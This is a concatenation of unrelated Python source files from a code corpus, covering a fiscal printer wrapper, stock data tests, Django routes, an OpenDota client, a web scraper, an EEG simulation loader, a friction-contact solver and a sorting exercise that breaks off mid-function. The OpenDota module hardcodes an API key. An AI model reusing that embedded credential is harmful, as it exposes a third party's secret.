self.METHOD(('libfptr_util_form_nomenclature', self.library))\n        return _method(self.interface)\n\n    def utilMapping(self):\n        _method = self.METHOD(('libfptr_util_mapping', self.library))\n        return _method(self.interface)\n\n    def readModelFlags(self):\n        _method = self.METHOD(('libfptr_read_model_flags', self.library))\n        return _method(self.interface)\n\n\n","sub_path":"atol/libfptr10.py","file_name":"libfptr10.py","file_ext":"py","file_size_in_byte":48832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}{"seq_id":"223324345","text":"import unittest\nfrom ..datafeed import *\nfrom datetime import datetime\n\nclass TestDataFeed(unittest.TestCase):\n\n    def __test_fetch_data(self):\n        start_date = datetime(2010,1,1)\n        end_date = datetime(2011,1,1)\n        url = 'http://ailabx.com/kensho/quotes?code={}&start={}&end={}'.format(\n            '600838,600519,000002',\n            start_date.strftime('%Y%m%d'),\n            end_date.strftime('%Y%m%d')\n        )\n        df = D.fetch_data(url)\n        print(df.head())\n\n        # load maindata fundamentals data\n        url = 'http://www.ailabx.com/kensho/maindata?code={}&start={}&end={}'.format(\n            '600519',\n            start_date.strftime('%Y%m%d'),\n            end_date.strftime('%Y%m%d')\n        )\n        df = D.fetch_data(url)\n        print(df)\n\n    def __test_load_benchmark(self):\n        start_date = datetime(2010, 12, 29)\n        end_date = datetime(2016, 1, 1)\n        df = D.load_benchmark('000300', start_date, end_date)\n        print(df.head())\n\n    def test_load_datas(self):\n        start_date = datetime(2016, 7, 15)\n        end_date = datetime(2016, 9, 1)\n        features = ['open_0/close_0','cross(pe_0,pe_1)','rank(return_1/return_0)','rank(pe_0)']\n        df = D.load_datas(['600519','600838','000002','000008'],start_date,end_date,features=features)\n        print(df.head())\n\n        print(D.get_bars_by_date('2016-08-24',code='600519'))\n        
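A minimal usage sketch for the libfptr10 wrapper sample above. The driver class name and constructor are assumptions (IFptr, as in the stock ATOL v10 Python wrapper; the class header lies outside this excerpt), the setting keys are placeholders, and the native libfptr10 shared library must be installed:

    from atol.libfptr10 import IFptr  # assumed class name, not visible in this excerpt

    fptr = IFptr()  # may need the shared-library path, depending on the driver build
    fptr.setSingleSetting("Port", "TCPIP")  # placeholder connection settings
    fptr.applySingleSettings()
    if fptr.open() != 0:
        # non-zero return codes are decoded through the error helpers defined above
        print(fptr.errorCode(), fptr.errorDescription())
    else:
        fptr.beep()
        fptr.close()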
print(D.get_bars_by_code('600519'))\n\n\n\n def __test_instruments(self):\n start = datetime(2010, 1, 1)\n end = datetime(2017, 7, 19)\n instruments = D.instruments(start,end)\n print(len(instruments),instruments[:10])\n\n\n def __test_fundamentals(self):\n start = datetime(2016, 1, 1)\n end = datetime(2017, 1, 1)\n\n df = D.fundamentals('600519',start,end)\n print(df)\n\n def __test_fundamentals_quotes(self):\n start = datetime(2016, 1, 1)\n end = datetime(2017, 1, 1)\n\n df = D.fundamentals('600519', start, end)\n #print(df)\n\n df_quotes = D._load_data('600519',start,end)\n print(df_quotes)\n","sub_path":"quant/engine/test/test_datafeed.py","file_name":"test_datafeed.py","file_ext":"py","file_size_in_byte":2079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"580437370","text":"\"\"\"embers URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.urls import path, re_path\nfrom django.conf.urls import url\n\nfrom . import views\n\napp_name = 'sim_trade'\n\nurlpatterns = [\n # path('sim_trade/', views.sim_trade, name='sim_trade'),\n path('sim_trade/', views.table, name='sim_trade'),\n re_path(r'sim_trade/getOwned/', views.getOwned, name='getOwned'),\n re_path(r'sim_trade/checkStock/(.+)/$', views.checkStock, name='checkStock'),\n re_path(r'sim_trade/sellCheckStock/(.+)/$', views.sellCheckStock, name='sellCheckStock'),\n url(r'^buy_stock$', views.buy_stock),\n url(r'^sell_stock$', views.sell_stock),\n]\n","sub_path":"embers/sim_trade/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"401316583","text":"import requests\n\nkey = \"3b8b4962-1674-449e-8a5e-b6a500f7b6bb\"\n\n\ndef get_match_details(match_id):\n \"\"\"\n :param match_id: int\n :return: dict\n Returns the request result of a particular match details\n \"\"\"\n url = 'https://api.opendota.com/api/matches/{}'.format(match_id)\n\n result = requests.get(url).json()\n\n return result\n\n\ndef get_hero_vs_hero_stats(heroA_id, heroB_id):\n \"\"\"\n :param heroA_id: int\n :param heroB_id: int\n :return: list\n Return the request result of stats of matches played between two heroes\n \"\"\"\n url = \"https://api.opendota.com/api/findMatches?teamA={}&teamB={}\".format(heroA_id, heroB_id)\n json_data = requests.get(url).json()\n\n matches_played = len(json_data)\n won = sum([i['teamawin'] for i in json_data])\n\n return [matches_played, won]\n","sub_path":"additional_modules/open_dota_api.py","file_name":"open_dota_api.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"198825745","text":"# -*- coding: utf-8 -*-\nimport scrapy\n\n\nclass GlassDataSpider(scrapy.Spider):\n name = 'glass_data'\n allowed_domains = ['www.glassesshop.com']\n start_urls = ['https://www.glassesshop.com/bestsellers']\n\n def 
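The OpenDota helper above returns a [matches_played, won] pair; a small sketch of calling it (the hero ids are illustrative placeholders, since OpenDota identifies heroes by numeric id):

    played, won = get_hero_vs_hero_stats(1, 8)  # example hero ids
    if played:
        print('team A won %d of %d (%.1f%%)' % (won, played, 100.0 * won / played))
    else:
        print('no recorded matches for this pairing')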
parse(self, response):\n \tfor product in response.xpath(\"//div[@class='col-sm-6 col-md-4 m-p-product']\"):\n \t\tyield {\n \t\t'product_url' : product.xpath(\".//p[@class='pname col-sm-12']/a/@href\").get(),\n \t\t'image_url' : product.xpath(\".//div[@class='pimg default-image-front']/a/img[@class='angle-image']/@src\").get(),\n \t\t'product_name' : product.xpath(\".//p[@class='pname col-sm-12']/a/text()\").get(),\n \t\t'product_price' : product.xpath(\".//div[@class='row']/div[contains(@class,'pprice')]/span/text()\").get() \t\t}\n\n \tnext_page = response.xpath(\"//ul[@class='pagination']/li[7]/a/@href\").get()\n\n \tif next_page:\n \t\tyield scrapy.Request (url=next_page , callback=self.parse) \n","sub_path":"glassshop/glassshop/spiders/glass_data.py","file_name":"glass_data.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"530925571","text":"import geoip2.database\nfrom ordereddict import OrderedDict\nfrom geoip2.errors import AddressNotFoundError\n\nfrom ipify.config import GEOIP_DATAFILE\n\n\ngi = geoip2.database.Reader(GEOIP_DATAFILE)\n\ndef lookup(ip):\n info = gi.city(ip)\n lang = 'en'\n return OrderedDict([\n ('ip', info.traits.ip_address),\n ('city', info.city.names.get(lang)),\n ('country', info.country.names.get(lang)),\n ('location', [\n info.location.latitude,\n info.location.longitude\n ]),\n ])\n","sub_path":"ipify/libs/geoip.py","file_name":"geoip.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"515418531","text":"import numpy as np\n#from scipy.integrate import quad\nfrom matplotlib import pyplot as plt\nimport os,inspect\nimport matplotlib.ticker as ticker\n\ndef parameters_kin(var,par):\n\ttopmassup=800\n\ttopmassdown=0\n\tbmassup=60\n\tbmassdown=0\n\tumassup=1\n\tumassdown=0\n\twmassup=300\n\twmassdown=0\n\tjmassup=60\n\tjmassdown=0\n\n\tdefault_range_up=800\n\tdefault_range_down=0\n\n\tdefault_nbins = 64\n\tmass_nbins = 64\n\tnbin = default_nbins\n\tlower_range=default_range_down\n\tupper_range=default_range_up\n\tup_l = 0.1\n\t#plt.style.use(\"atlas.mplstyle\")\n\tif(par == \"Photon\" and var==\"PT\"):\n\t\tupper_range=default_range_up\n\t\tlower_range=default_range_down\n\t\tnbin=default_nbins\n\tif(par == \"TopQuark\" and var==\"PT\"):\n\t\tupper_range=default_range_up\n\t\tlower_range=default_range_down\n\t\tnbin=64\n\tif (var == \"Eta\" or var == \"Phi\"):\n\t\tlower_range=-5\n\t\tupper_range=5\n\t\tnbin = 32\n\t\tup_l = 0\n\tif (var == \"Eta\" and (par==\"Photon\" or par==\"bJet\" or par==\"Jet\")):\n\t\tlower_range=-2.5\n\t\tupper_range=2.5\n\t\tnbin = 32\n\t\tup_l = 0\n\tif(var==\"M\"):\n\t\tup_l=0\n\t\tnbin=mass_nbins\n\t\tif(\"W\" in par):\n\t\t\tlower_range=wmassdown\n\t\t\tupper_range=wmassup\n\t\tif(\"Top\" in par):\n\t\t\tlower_range=topmassdown\n\t\t\tupper_range=topmassup\n\t\tif(\"Jet\" in par):\n\t\t\t\tlower_range=jmassdown\n\t\t\t\tupper_range=jmassup\n\t\tif(\"bJet\" in par):\n\t\t\tlower_range=bmassdown\n\t\t\tupper_range=bmassup\n\t\tif(\"UQuark\" in par):\n\t\t\tlower_range=umassdown\n\t\t\tupper_range=umassup\n\tif(var==\"PT\"):\n\t\tif(\"bJet\" in par):\n\t\t\tupper_range=400\n\treturn [lower_range,upper_range,nbin,up_l]\n\n\nsam = [\"dec\",\"int\",\"pro\"]\nvar = [\"PT\",\"Eta\",\"Phi\",\"M\"]\npar = [\"Photon\",\"Jet\",\"bJet\",\"WBoson\",\"TopQuark\"]\n\nPREFIX = 
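A usage sketch for the geoip helper above; the address is a placeholder, and GEOIP_DATAFILE must point at a valid GeoLite2-City database for the lookup to succeed:

    try:
        info = lookup('93.184.216.34')  # placeholder address
        print(info['city'], info['country'], info['location'])
    except AddressNotFoundError:
        print('address not present in the GeoIP database')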
os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))+\"/\"\n\ndatas = os.listdir(PREFIX+\"data\")\n\n\nif(\"corr\" not in os.listdir(PREFIX+\"plots/\")):\n\tos.chdir(PREFIX+\"plots/\")\n\tos.mkdir(\"corr\")\n\tos.chdir(PREFIX)\n\nratiox= 15\nratioy= 15\n\nbfmpd = np.array([])\nbfmi = np.array([])\nnames = []\n\nfor pa1 in par:\n\tfor va1 in var:\n\t\tif(pa1 == \"Photon\" and va1 == \"M\"):\n\t\t\tcontinue\n\n\t\tevp = np.genfromtxt(\"data/pro_\"+pa1+\"_\"+va1+\".txt\");evd = np.genfromtxt(\"data/dec_\"+pa1+\"_\"+va1+\".txt\");evi = np.genfromtxt(\"data/int_\"+pa1+\"_\"+va1+\".txt\")\n\t\tevp = evp[(np.abs(evp)>0) & (evp!=999.9)];evd = evd[(np.abs(evd)>0) & (evd!=999.9)];evi = evi[(np.abs(evi)>0) & (evi!=999.9)]\n\t\tevpd = np.concatenate((evp, evd), axis=0)\n\n\t\tif bfmpd.size == 0:\n\t\t\tbfmpd = np.concatenate((bfmpd,evpd))\n\t\telse:\n\t\t\tbfmpd = np.vstack((bfmpd,evpd))\n\n\t\tif bfmi.size == 0:\n\t\t\tbfmi = np.concatenate((bfmi,evi))\n\t\telse:\n\t\t\tbfmi = np.vstack((bfmi,evi))\n\n\t\tnames.append(pa1+va1)\n\nfig = plt.figure(num=None, figsize=(ratiox,ratioy), dpi=80, facecolor='w', edgecolor='k')\n\ncorrpd = np.corrcoef(bfmpd)\n\nplt.imshow(corrpd)\nplt.colorbar()\nplt.xticks(np.arange(len(names)),names, rotation=45)\nplt.yticks(np.arange(len(names)),names, rotation=45)\n\nimport itertools\nthresh = corrpd.max() / 2.\n\n# use fresh loop variables so the tick-label counts above are not clobbered\nfor r, c in itertools.product(range(corrpd.shape[0]), range(corrpd.shape[1])):\n\tplt.text(c, r,format(corrpd[r, c], '.2f'),fontsize=13,\n\thorizontalalignment=\"center\",\n\tcolor=\"white\" if corrpd[r, c] > thresh else \"black\")\nplt.title(\"Correlation Matrix Production + Decay\")\nplt.savefig(\"plots/CorrMatrixpd.pdf\",bbox_inches='tight')\n\nplt.close()\nfig.clear()\n\nplt.figure(num=None, figsize=(ratiox,ratioy), dpi=80, facecolor='w', edgecolor='k')\n\ncorri = np.corrcoef(bfmi)\n\nplt.imshow(corri)\nplt.colorbar()\nplt.xticks(np.arange(len(names)),names, rotation=45)\nplt.yticks(np.arange(len(names)),names, rotation=45)\n\nthresh = corri.max() / 2.\n\nfor r, c in itertools.product(range(corri.shape[0]), range(corri.shape[1])):\n\tplt.text(c, r,format(corri[r, c], '.2f'),fontsize=13,\n\thorizontalalignment=\"center\",\n\tcolor=\"white\" if corri[r, c] > thresh else \"black\")\nplt.title(\"Correlation Matrix Interference\")\nplt.savefig(\"plots/CorrMatrixi.pdf\",bbox_inches='tight')\n\n\n\n\n\n\n","sub_path":"delphcorrM.py","file_name":"delphcorrM.py","file_ext":"py","file_size_in_byte":3786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}{"seq_id":"324417767","text":"import time\nimport numpy as np\nimport mne\nimport torch\nfrom torch.utils import data\nfrom mne.datasets import sample\nimport random\nimport multiprocessing as mp\nfrom itertools import product\nimport os\n\n\n# num_cpu = '9' # Set as a string\n# os.environ['OMP_NUM_THREADS'] = num_cpu\nclass ForwardModelDataset(data.Dataset):\n    def __init__(self, num_examples, num_channels=44, batch_size=64, length=1000, save_x_t=False):\n        self.batch_size = batch_size\n        self.length = length\n        self.num_channels = num_channels\n        self.num_examples = num_examples\n        self.num_examples_required = np.math.ceil(num_examples / self.num_channels)\n        self.preloaded_examples_source = []\n        self.preloaded_examples_eegs = []\n        self.save_x_t = save_x_t\n        self.load_forward_model()\n        self.load_examples()\n        if save_x_t:\n            assert (len(self.preloaded_examples_source) == len(self.preloaded_examples_eegs))\n\n    def __len__(self):\n        return 
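np.corrcoef, as used in the correlation script above, treats each row of its input as one variable, which is why the script vstacks one kinematic distribution per row before correlating. A standalone illustration:

    import numpy as np

    rows = np.array([[1.0, 2.0, 3.0, 4.0],   # variable 1, four observations
                     [2.0, 4.0, 6.0, 8.0]])  # variable 2, perfectly correlated with it
    print(np.corrcoef(rows))                 # 2x2 matrix of pairwise correlations, all ones here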
int(len(self.preloaded_examples_eegs) / self.batch_size)\n\n def __getitem__(self, index):\n # print(\"please use either .getEEGs or .getSources\")\n # return None\n start = self.batch_size * index\n end = start + self.batch_size\n assert (end <= len(self.preloaded_examples_eegs))\n EEG = self.preloaded_examples_eegs[start: end]\n sample = torch.from_numpy(np.asarray(EEG)).type('torch.FloatTensor')\n sample = sample.view(-1, self.length, 1)\n return sample\n\n def getEEGs(self, index):\n start = self.batch_size * index\n end = start + self.batch_size\n assert (end <= len(self.preloaded_examples_eegs))\n EEG = self.preloaded_examples_eegs[start: end]\n sample = torch.from_numpy(np.asarray(EEG)).type('torch.FloatTensor')\n sample = sample.view(-1, self.length, 1)\n return sample\n\n def getSources(self, index):\n assert (self.save_x_t), \"save_x_t is False. Sources Not Saved\"\n start = self.batch_size * index\n end = start + self.batch_size\n assert (end <= len(self.preloaded_examples_source))\n source = self.preloaded_examples_source[start: end]\n sample = torch.from_numpy(np.asarray(source)).type('torch.FloatTensor')\n return sample\n\n def load_forward_model(self):\n data_path = sample.data_path()\n raw_fname = data_path + '/MEG/sample/sample_audvis_raw.fif'\n self.info = mne.io.read_info(raw_fname)\n # fwd = mne.read_forward_solution(\"../forward_model/sample_forward_model\")\n # fwd = mne.read_forward_solution(\"../../../../../forward_model/sample_forward_model\") # when run.py path relative?\n fwd = mne.read_forward_solution(\"/mnt/home2/dlongo/eegML/forward_model/sample_forward_model\")\n self.fwd_fixed = mne.convert_forward_solution(fwd, surf_ori=True, force_fixed=True,\n use_cps=True)\n leadfield = self.fwd_fixed['sol']['data']\n self.n_dipoles = leadfield.shape[1]\n self.vertices = [src_hemi['vertno'] for src_hemi in self.fwd_fixed['src']]\n\n def load_examples(self):\n if self.save_x_t:\n for i in range(self.num_examples_required):\n self.preloaded_examples_source += [np.random.randn(self.n_dipoles, self.length) * 1e-9]\n self.preloaded_examples_eegs += self.generate_eeg(i)\n self.preloaded_examples_source[:self.num_examples]\n else:\n for i in range(self.num_examples_required):\n self.preloaded_examples_eegs += self.generate_source_then_eeg()\n self.preloaded_examples_eegs = self.preloaded_examples_eegs[:self.num_examples]\n # print(\"pre\", len(self.preloaded_examples_eegs), np.asarray(self.preloaded_examples_eegs).shape)\n # processes =[mp.Process(target=self.generate_eeg, args=(i,)) for i in range(self.num_examples)]\n # for p in processes: p.start()\n # for p in processes: p.join()\n # pool = mp.Pool(mp.cpu_count() - 4) # minus to be safe\n # with mp.Pool(processes=mp.cpu_count() - 4) as pool:\n # results = pool.starmap(self.generate_eeg, product(list(range(self.num_examples))))\n # print(results)\n # self.preloaded_examples_source = [(np.random.randn(self.n_dipoles, self.length) * 1e-9) for i in range(self.num_examples)]\n # self.preloaded_examples_source = [x.get() for x in self.preloaded_examples_source]\n # pool.close()\n # pool.join()\n # jobs = []\n # for i in range(self.num_examples):\n # p = mp.Process(target=self.generate_eeg, args=(i,), name='daemon')\n # p.daemon = True\n # jobs.append(p)\n # p.start()\n # time.sleep(1)\n # p.join()\n # # with mp.Pool(mp.cpu_count() - 4) as pool:\n # self.preloaded_examples_eegs = pool.map_async(self.generate_eeg, list(range(self.num_channels)))\n # self.preloaded_examples_eegs = [pool.(self.generate_eeg(i)) for i in 
range(self.num_examples)]\n # self.preloaded_examples_eegs = self.preloaded_examples_eegs.get() # [x.get() for x in self.preloaded_examples_eegs]\n # pool.close()\n # pool.join()\n # print(\"type eegs\", len(self.preloaded_examples_eegs)) \n\n # def generate_eeg(self, source_index):\n # stc = mne.SourceEstimate(self.preloaded_examples_source[source_index], self.vertices, tmin=0., tstep=1 / 250)\n # leadfield = mne.apply_forward(self.fwd_fixed, stc, self.info).data / 1e-9\n # self.preloaded_examples_eegs = [leadfield[:self.num_channels]]\n # print(\"finished\", source_index, type(self.preloaded_examples_eegs[-1]))\n\n def generate_eeg(self, source_index):\n stc = mne.SourceEstimate(self.preloaded_examples_source[source_index], self.vertices, tmin=0., tstep=1 / 250)\n leadfield = mne.apply_forward(self.fwd_fixed, stc, self.info).data / 1e-9\n return list(leadfield[:self.num_channels])\n\n def generate_source_then_eeg(self):\n source = np.random.randn(self.n_dipoles, self.length) * 1e-9\n stc = mne.SourceEstimate(source, self.vertices, tmin=0., tstep=1 / 250)\n leadfield = mne.apply_forward(self.fwd_fixed, stc, self.info).data / 1e-9\n return list(leadfield[:self.num_channels])\n\n def shuffle(self):\n if self.save_x_t:\n combined = list(zip(self.preloaded_examples_source, self.preloaded_examples_eegs))\n random.shuffle(combined)\n self.preloaded_examples_source, self.preloaded_examples_eegs = zip(*combined)\n else:\n random.shuffle(self.preloaded_examples_eegs)\n\n\nif __name__ == \"__main__\":\n FMD = ForwardModelDataset(10, batch_size=2)\n print(\"EEG Shape\", FMD.getEEGs(1).shape, torch.sum(FMD.getEEGs(1)))\n # print(\"Source shape\", FMD.getSources(1).shape, torch.sum(FMD.getSources(1)))\n FMD.shuffle()\n print(\"EEG Shape\", FMD.getEEGs(1).shape, torch.sum(FMD.getEEGs(1)))\n print(len(FMD))\n # print(\"Source shape\", FMD.getSources(1).shape, torch.sum(FMD.getSources(1)))\n","sub_path":"data_loaders/forward_model_dataloader_one_c.py","file_name":"forward_model_dataloader_one_c.py","file_ext":"py","file_size_in_byte":7064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"401799041","text":"from django.shortcuts import render, HttpResponse\nfrom contactDetail.forms import *\nfrom django.contrib.auth.decorators import login_required\n# Create your views here.\n\n@login_required\ndef contactDetail(request):\n\tif request.method == 'POST':\n\t\tform = contactForm(request.POST)\n\t\tif form.is_valid():\n\t\t\t\n\t\t\taddress1 = form.cleaned_data['address1']\n\t\t\taddress2 = form.cleaned_data['address2']\n\t\t\tstate = form.cleaned_data['state']\n\t\t\tzip_code = form.cleaned_data['zip_code']\n\t\t\tphone = form.cleaned_data['phone']\n\t\t\tform = form.save(commit=False)\n\t\t\tform.user = request.user\n\t\t\tform.save()\n\t\t\t\n\t\t\treturn HttpResponse('thank you')\n\t\t\t\n\telse:\n\t\tform = contactForm()\n\treturn render(request, 'home/contactDetail.html', {\"form\":form})","sub_path":"contactDetail/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"503312881","text":"import pandas as pd\nimport os\nfrom datetime import datetime, timedelta\nimport itertools\nfrom collections import Counter\nfrom functools import reduce\n\ndef str_var(s):\n if s == '-':\n return None\n try:\n return float(s[:-1])*mil[s[-1]]\n except:\n return s\n\ndef getFiles(closing=True, count=0):\n files = sorted([f for f in os.listdir() 
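A sketch of driving the ForwardModelDataset above. Constructing it downloads the MNE sample dataset and reads a forward model from the hard-coded path, so this only runs where those are available; batches come back as (batch_size, length, 1) tensors:

    fmd = ForwardModelDataset(num_examples=8, batch_size=4, length=1000)
    for i in range(len(fmd)):        # len() is the number of whole batches
        eeg = fmd.getEEGs(i)
        print(eeg.shape)             # torch.Size([4, 1000, 1])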
if len(f) == 16])\n    if closing:\n        files = [f for f in files if file_dt(f).hour > 13]\n    if count > 0: files = files[:-count]\n    return files\n\ndef getAboveAverageSectors(df):\n    avgs = df.mean()\n    sectAvgs = {s: df[df['Sector'] == s].mean() for s in df['Sector'].drop_duplicates()}\n    return {avg: [s for s in sectAvgs if sectAvgs[s][avg] > avgs[avg]] for avg in avgs.index}\n\ndef getStocksWithBest(stat, n, df):\n    reduce_df = lambda d: d[d >= d.mean()]\n    ndf = reduce_df(df[stat])\n    while len(ndf) > n:\n        ndf = reduce_df(ndf)\n    return ndf.keys()#[df.loc[i]['Ticker'] for i in ndf.index]\n\nmil = {'%': 1, 'M': 1e6, 'B': 1e9}\nred = lambda x, y: x.combine(y, lambda l, r: l+[r] if isinstance(l, list) else [l, r])\nfile_dt = lambda f: datetime.strptime(f, '%Y%m%d%H%M.csv')\ndt_file = lambda dt: dt.strftime('%Y%m%d%H%M.csv')\nscoreSectors = lambda df: Counter(itertools.chain.from_iterable(getAboveAverageSectors(df).values()))\nbestStocks = lambda df: Counter(itertools.chain.from_iterable([getStocksWithBest(stat, 20, df) for stat in df.mean().index]))\nbestStockOfBestSector = lambda df: bestStocks(df[df['Sector'] == scoreSectors(df).most_common()[0][0]])\n\ndef findTrends(dfs, stat, cut, filters):\n    list_str = lambda l: ''.join(['G' if l[n]*(1+cut) < l[n+1] else 'L' if l[n+1] < l[n]*(1-cut) else '-' for n in range(len(l)-1)])\n    return [t for t, v in reduce(red, [df[stat] for df in dfs]).apply(list_str).items() if filters(v)]\n\ndef find_duplicates(lists):\n    # tickers that appear in every list\n    return [t for t in lists[0] if all(t in l for l in lists[1:])]\n\ndef getGoodPriVolStocks(dfs):\n    vols = findTrends(dfs, 'Volume', 0.1, lambda v: 1<v.count('G'))\n    pris = findTrends(dfs, 'Price', 0.03, lambda v: v.count('L')>=3 and 'G' not in v[-2:])\n    return find_duplicates([vols, pris])\n\nfiles = getFiles()\ndfs = [pd.read_csv(f).set_index('Ticker').applymap(str_var) for f in files]\n\ndef findTrendTrends(dfs):\n    values = {'Volume':[0.1, lambda v: 1<v.count('G') and v.count('L')>=1],\n              'Price':[0.03, lambda v: v.count('L')>=3 and 'G' not in v[-2:]]}\n    return find_duplicates([findTrends(dfs, k, v[0], v[1]) for k, v in values.items()])\n\ntot = 1.0\nfor n in range(len(dfs)-6):\n    print(file_dt(files[n+5]))\n    total = 1.0\n    for ticker in findTrendTrends(dfs[n:n+5]):\n        change = dfs[n+6].at[ticker, 'Change']\n        total*=1+change/100\n        tot*=1+change/100\n        print(ticker, change)\n    print('TOTAL', total)\nprint('Omega Total', tot)\n","sub_path":"Sorter.py","file_name":"Sorter.py","file_ext":"py","file_size_in_byte":2760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}{"seq_id":"607895344","text":"import numpy as np\nimport math\nfrom scipy import optimize\nimport sys as sys\n\"\"\"This program determines if an assembly of bodies in frictional contact will remain standing. If the assembly stands\nthe program will return the magnitude of the contact force on each edge of each friction cone.\n\nTo use, two files are needed. \nFirstly, a body file containing the information about each body with the following columns:\nmass, x coordinate of cg, y coordinate of cg\nSecondly a contacts file containing information about the contacts between each body should be included. It should \nhave the following columns:\ncontact x coordinate, contact y coordinate, coefficient of friction, first body number, second body number, contact normal\ndirection relative to the first body in radians.\nNote, the ground should be assigned the body number \"0\"\n\nExample usage: \n\nInput filename including the extension for the body data file:\nstanding assembly bodies.csv\nInput filename including the extension for the contact data file:\nstanding assembly contacts.csv\nAssembly stands\nk =[ 3.351 15.538 0. 6.093 0. 
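The trend strings built by findTrends above encode step-to-step moves as 'G' (gain beyond the cut), 'L' (loss beyond it) or '-' (flat). A worked example with a 3% cut:

    prices = [100.0, 104.0, 104.5, 99.0]
    cut = 0.03
    s = ''.join('G' if prices[n] * (1 + cut) < prices[n + 1]
                else 'L' if prices[n + 1] < prices[n] * (1 - cut)
                else '-'
                for n in range(len(prices) - 1))
    print(s)  # 'G-L': a +4% gain, a flat step, then a -5.3% loss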
27.42 62.456 22.85 ]\n\n\"\"\"\n#save the output in .txt\nclass Logger(object):\n def __init__(self):\n self.terminal = sys.stdout\n self.log = open(\"logfile.log\", \"a\")\n\n def write(self, message):\n self.terminal.write(message)\n self.log.write(message) \n\n def flush(self):\n #this flush method is needed for python 3 compatibility.\n #this handles the flush command by doing nothing.\n #you might want to specify some extra behavior here.\n pass \n\nsys.stdout = Logger()\n# query user for input files\nbody_file = input(\"Input filename including the extension for the body data file:\\n\")\ncontact_file = input(\"Input filename including the extension for the contact data file:\\n\")\n\n# import the bodies and contacts data\nbodies = np.genfromtxt(body_file, delimiter=\",\", skip_header=1)\ncontacts = np.genfromtxt(contact_file, delimiter=\",\", skip_header=1)\n\n# create a matrix of unit forces and their corresponding moments\ncoefficients = np.zeros((3 * bodies.shape[0], contacts.shape[0] * 2 + bodies.shape[0]), dtype=float)\n\nfor body_no, body in enumerate(bodies):\n # select all contacts where one of the bodies in the contact is the selected body\n for contact_no, contact in enumerate(contacts):\n if contact[3] == body_no + 1 or contact[4] == body_no + 1:\n # calculate the angle of each edge of the friction cone\n alpha = math.atan(contact[2])\n theta_1 = contact[5] + alpha\n theta_2 = contact[5] - alpha\n\n # reverse the direction of force for the second body in the contact set except where the first body is ground\n if contact[4] == body_no + 1 and contact[3] != 0:\n direction = -1\n else:\n direction = 1\n\n # calculate the x and y components of the unit vector representing each edge of the friction cone\n # calculate the magnitude of the moment created by the unit force. 
All moments are about the origin\n            N_x1 = math.cos(theta_1) * direction\n            N_y1 = math.sin(theta_1) * direction\n            m1 = np.cross([contact[0], contact[1]], [N_x1, N_y1])\n            N_x2 = math.cos(theta_2) * direction\n            N_y2 = math.sin(theta_2) * direction\n            m2 = np.cross([contact[0], contact[1]], [N_x2, N_y2])\n\n            # add the wrenches for each edge of the friction cone to the coefficients matrix in the correct position\n            new_wrenches = np.array([[N_x1, N_y1, float(m1)], [N_x2, N_y2, float(m2)]]).T\n            coefficients[body_no*3:body_no*3 + new_wrenches.shape[0], contact_no * 2:contact_no * 2 + new_wrenches.shape[1]] = new_wrenches\n\n    # calculate gravitational wrench on the body and add it to the coefficients matrix\n    fg_y = -body[0] * 9.81\n    mg_y = np.cross([body[1], body[2]], [0, fg_y])\n    gravitational_wrench = np.array([0, fg_y, mg_y])\n    coefficients[body_no * 3:body_no * 3 + gravitational_wrench.shape[0], contacts.shape[0] * 2 + body_no] = gravitational_wrench.T\n\n# evaluate force closure using the linprog function from the scipy library\nc = [1] * coefficients.shape[1]  # Coefficients of the linear objective function to be minimized\n\n# each row should sum to zero\nA_eq = coefficients  # array that when multiplied by x gives the values of the equality constraints at x\nb_eq = np.zeros(coefficients.shape[0])  # RHS of each equality constraint in A_eq\n\n# the coefficients for the gravity terms should be equal to 1, coefficients for all other terms should be >=0\nupper_bound = [None] * contacts.shape[0] * 2\nlower_bound = [0] * contacts.shape[0] * 2\nupper_bound += [1] * bodies.shape[0]\nlower_bound += [1] * bodies.shape[0]\n\nresult = optimize.linprog(c, A_eq=A_eq, b_eq=b_eq, bounds=list(zip(lower_bound, upper_bound)), options={'tol': .000001})\nif result.success:\n    print('Assembly stands')\n    np.set_printoptions(precision=3, suppress=True)\n    print(\"k =\" + str(result.x[:-2]))\nelse:\n    print(\"Assembly collapses\")\n","sub_path":"Course_5/Project_6/Code/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":5122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}{"seq_id":"29620799","text":"## Name: Allie Blaising \r\n\r\n\r\nimport random\r\nimport time\r\n\r\n\r\ndef selection_sort(ints):\r\n    comparison_count = 0\r\n    for i in range(len(ints) - 1, 0, -1):\r\n        position_of_max = 0\r\n        for j in range(1, i + 1):\r\n            comparison_count += 1\r\n            if ints[j] > ints[position_of_max]:\r\n                position_of_max = j\r\n        ints[i], ints[position_of_max] = ints[position_of_max], ints[i]\r\n    return comparison_count \r\n\r\n\r\n\r\ndef insertion_sort(alist):\r\n    count = 0\r\n    for index in range(1,len(alist)):\r\n        count += 1 \r\n        currentvalue = alist[index]\r\n        position = 